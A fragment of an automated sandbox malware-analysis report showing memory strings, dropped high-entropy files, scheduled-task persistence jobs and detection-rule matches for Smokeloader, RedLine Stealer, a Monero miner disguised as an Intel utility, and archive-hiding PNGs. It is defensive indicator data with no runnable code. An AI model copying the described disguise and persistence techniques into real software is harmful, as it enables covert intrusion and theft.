                        Source: b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: AzVRM7c.exe, 00000029.00000003.269622740092.00000247ADF27000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622880866.00000247ADF38000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/k
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ormF
                        Source: AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621849034.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620565239.00000247ADED9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620670719.00000247ADEDC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622439350.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/s
                        Source: AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621849034.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620565239.00000247ADED9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620670719.00000247ADEDC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622439350.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/s42
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sil
                        Source: dwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576629725.00000224326A7000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/t
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/t&HnL
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/u
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/v
                        Source: dwVrTdy.exe, 00000028.00000003.269595426130.000002563560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com:443
                        Source: t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                        Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore(or
                        Source: AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                        Source: AzVRM7c.exe, 00000029.00000003.269621997024.00000247ADEC6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADEC7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621655336.00000247ADEC4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly0A80DFEA22
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly1CC4ED49I0
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly230C76F8r
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326BB000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576581671.00000224326AC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly6279FB6ET
                        Source: t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyZ
                        Source: dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyv
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore0F218$0xn35
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore1D2D8
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore813C
                        Source: AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreF4348
                        Source: dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreH
                        Source: dwVrTdy.exe, 00000028.00000003.269592668229.00000256355FC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreT
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreZ
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoree
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                        Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra/crxn
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra33ACC14302898
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra9FF0961B2DB99
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraEC18E694E4120
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraEC2E61F0CE2D8
                        Source: dwVrTdy.exe, 00000028.00000003.269592668229.00000256355FC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraP
                        Source: dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666538652.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraate2/crx
                        Source: dwVrTdy.exe, 00000028.00000003.269595557978.0000025635652000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595113781.000002563564B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraate2/crx)
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox1E34CF474AA0ECBD649EF871291A01E4E5
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox49
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox8C450E
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxB4d3
                        Source: AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxf
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox~
                        Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom
                        Source: LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: LoaderClient.exe, 0000002E.00000003.269802883730.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269884153645.00000178EAFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exe entropy: 7.99505709583Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe entropy: 7.99505709583Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exe entropy: 7.99505709583Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exe entropy: 7.99505709583Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99772074518Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99772354314Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99772670895Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99772941561Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99773141174Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png entropy: 7.99450935401Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f entropy: 7.99450935401Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip entropy: 7.99352358954Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png entropy: 7.99450935401Jump to dropped file

                        System Summary

                        barindex
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                        Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                        Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                        Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
                        Source: file.bin.7.drZip Entry: encrypted
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: skotes.exe.0.drStatic PE information: section name:
                        Source: skotes.exe.0.drStatic PE information: section name: .idata
                        Source: random[1].exe0.4.drStatic PE information: section name:
                        Source: random[1].exe0.4.drStatic PE information: section name: .idata
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name:
                        Source: 0d47c4c34f.exe.4.drStatic PE information: section name: .idata
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name:
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name: .idata
                        Source: H9TU4oY[1].exe.4.drStatic PE information: section name:
                        Source: H9TU4oY.exe.4.drStatic PE information: section name:
                        Source: H9TU4oY.exe.4.drStatic PE information: section name: .idata
                        Source: H9TU4oY.exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name: .idata
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name:
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name: .idata
                        Source: ZiYbk6W.exe.4.drStatic PE information: section name:
                        Source: random[1].exe1.4.drStatic PE information: section name:
                        Source: random[1].exe1.4.drStatic PE information: section name: .idata
                        Source: random[1].exe1.4.drStatic PE information: section name:
                        Source: f11f18202b.exe.4.drStatic PE information: section name:
                        Source: f11f18202b.exe.4.drStatic PE information: section name: .idata
                        Source: f11f18202b.exe.4.drStatic PE information: section name:
                        Source: random[2].exe.4.drStatic PE information: section name:
                        Source: random[2].exe.4.drStatic PE information: section name: .idata
                        Source: random[2].exe.4.drStatic PE information: section name:
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name:
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name: .idata
                        Source: 3a4323f24d.exe.4.drStatic PE information: section name:
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name:
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name: .idata
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: section name:
                        Source: random[2].exe1.4.drStatic PE information: section name:
                        Source: random[2].exe1.4.drStatic PE information: section name: .idata
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name:
                        Source: 5102d46fb9.exe.4.drStatic PE information: section name: .idata
                        Source: axplong.exe.5.drStatic PE information: section name:
                        Source: axplong.exe.5.drStatic PE information: section name: .idata
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 6%
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B596AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,12_2_00B596AC
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
